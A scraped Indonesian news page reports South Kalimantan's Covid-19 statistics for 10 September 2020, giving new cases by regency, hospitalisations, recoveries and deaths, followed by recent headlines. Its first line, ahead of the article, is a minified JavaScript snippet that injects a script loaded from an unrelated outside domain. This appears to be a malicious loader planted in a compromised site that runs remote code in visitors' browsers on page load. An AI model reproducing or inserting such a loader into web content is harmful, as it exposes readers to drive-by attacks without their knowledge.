(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Categories: Kalimantan Selatan

Hari Ini Kasus Covid-19 Capai 9.078 Kasus, 230 Orang Masih Dirawat di RS


KANALKALIMANTAN.COM, BANJARBARU – Jumlah kasus positif Covid-19 di Kalimantan Selatan tak kunjung melandai. Data dari Gugus Tugas Percepatan Penanganan (GTPP) Covid-19 Kalsel pada Kamis (10/9/2020) sore mencatat, kasus positif Covid-19 di Kalsel telah menyentuh angka 9.078 kasus.

Di mana, total ada 9.078 kasus positif Covid-19 di Kalsel, dengan attack rate (AR) sebesar 210,921 per 100 ribu penduduk. “Ada penambahan kasus terkonfirmasi positif, kasus baru sebanyak 77 orang,” kata Juru Bicara GTPP Covid-19 Kalsel M. Muslim, Kamis (10/9/2020) petang.

Dari 77 orang yang dinyatakan positif Covid-19 hari ini, didominasi dari hasil tracing. Mayoritas dari Kabupaten Tapin 35 orang dan Kabupaten Banjar 19 orang. Disusul dari Kota Banjarmasin 11 orang, Kabupaten Hulu Sungai elatan 6 orang, Kabupaten Hulu Sungai Utara 5 orang dan Kabupaten Tanah Laut 1 orang.

“Saat ini yang kita rawat atau yang kita sebut kasus aktif sebanyak 1.519 kasus. Atau dari jumlah seluruhnya kumulasi total kasus yang ada di Provinsi Kalsel ada 16,73 persen yang saat ini dalam perawatan,” imbuh Muslim.

Dari 1.519 kasus aktif, 230 orang diantaranya masih menjalani perawatan di beberapa rumah sakit rujukan. Sisanya, sebanyak 1.289 orang menjalani isolasi mandiri atau karantina khusus di Kalsel.

“Kita sampaikan bahwa 1.519 kasus tersebut, sebagian besar mereka-mereka yang tidak memiliki gejala atau gejala ringan. Sedangkan kasus-kasus baru hari ini adalah kasus berdasarkan hasil tracing yang dilakukan di kabupaten dan kota, yang merupakan lanjutan dari swab masif yang kita lakukan terhadap 12 ribu lebih orang yang kita ambil swabnya. Dari kontak-kontak erat itulah yang saat ini kita lakukan tracing,” papar Muslim.

Muslim yang juga Kepala Dinas Kesehatan Provinsi Kalsel ini menambahkan, kasus positif Covid-19 yang dinyatakan sembuh kembali bertambah. Saat ini sudah ada 7.177 kasus atau 79,06 persen kasus positif Covid-19 yang sembuh. “Ada 119 orang yang dinyatakan sembuh (dari Covid-19),” imbuh Muslim.

Kasus positif Covid-19 yang dinyatakan sembuh mayoritas berasal dari karantina di beberapa kabupaten dan kota di Kalsel. Didominasi dari Kabupaten Tanah Laut 33 orang, Kota Banjarmasin 30 orang dan Kabupaten Balangan 24 orang.

Disusul dari Kabupaten Banjar 19 orang, Kabupaten Hulu Sungai Selatan 5 orang, masing-masing 4 orang dari Kabupaten Tapin dan Hulu Sungai Utara. Terakhir 2 orang dari Kabupaten Barito Kuala.

Sedangkan kasus kematian akibat Covid-19 kembali bertambah 1 orang, berasal dariKabupaten Hulu Sungai Selatan dan Hulu Sungai Tengah. Saat ini, tercatat ada 382 kasus positif Covid-19 yang meninggal dunia, dengan case fatality rate (CFR) sebesar 4,21 persen.

Hingga kini, tercatat ada 770 orang yang dinyatakan suspek atau diduga terpapar Covid-19 di Kalsel. (Kanalkalimantan.com/fikri)

Reporter : Fikri
Editor : Cell

 


Al Ghifari

Recent Posts

Diberi Waktu Tiga Bulan, Peternakan Babi di Jalan Pandarapan Harus Dibongkar

KANALKALIMANTAN.COM, BANJARBARU – Sebanyak 21 kepala keluarga (KK) pemilik peternakan babi di Jalan Pandarapan RT… Read More

13 jam ago

Upacara Ritual Adat Mamapas Lewu di Desa Penda Ketapi

KANALKALIMANTAN.COM, KUALA KAPUAS - Warga Desa Penda Ketapi, Kecamatan Kapuas Barat, Kabupaten Kapuas, Kalteng, menggelar… Read More

13 jam ago

Penyuluhan Kesehatan Satgas TMMD di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Satgas TNI Manunggal Membangun Desa (TMMD) menggelar sosialisasi penyuluhan kesehatan masyarakat di… Read More

14 jam ago

Terbagi Tiga Kloter, Pj Bupati Kapuas Ingatkan Calon Haji Jaga Kondisi Kesehatan

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi melepas ratusan jemaah calon haji… Read More

14 jam ago

81 Peserta Ikuti Audisi Pemilihan Nanang dan Galuh Kabupaten Banjar

KANALKALIMANTAN.COM, MARTAPURA - Sebanyak 81 orang terdiri atas 27 laki-laki dan 54 perempuan dari beberapa… Read More

14 jam ago

Rumah di Banjarmasin Ambruk ke Sungai, Penghuni Keluar Lewat Jendela

KANALKALIMANTAN.COM, BANJARMASIN - Sebuah rumah di Jalan Sutoyo S, Gang Serumpun, Kelurahan Pelambuan, Kecamatan Banjarmasin… Read More

14 jam ago

This website uses cookies.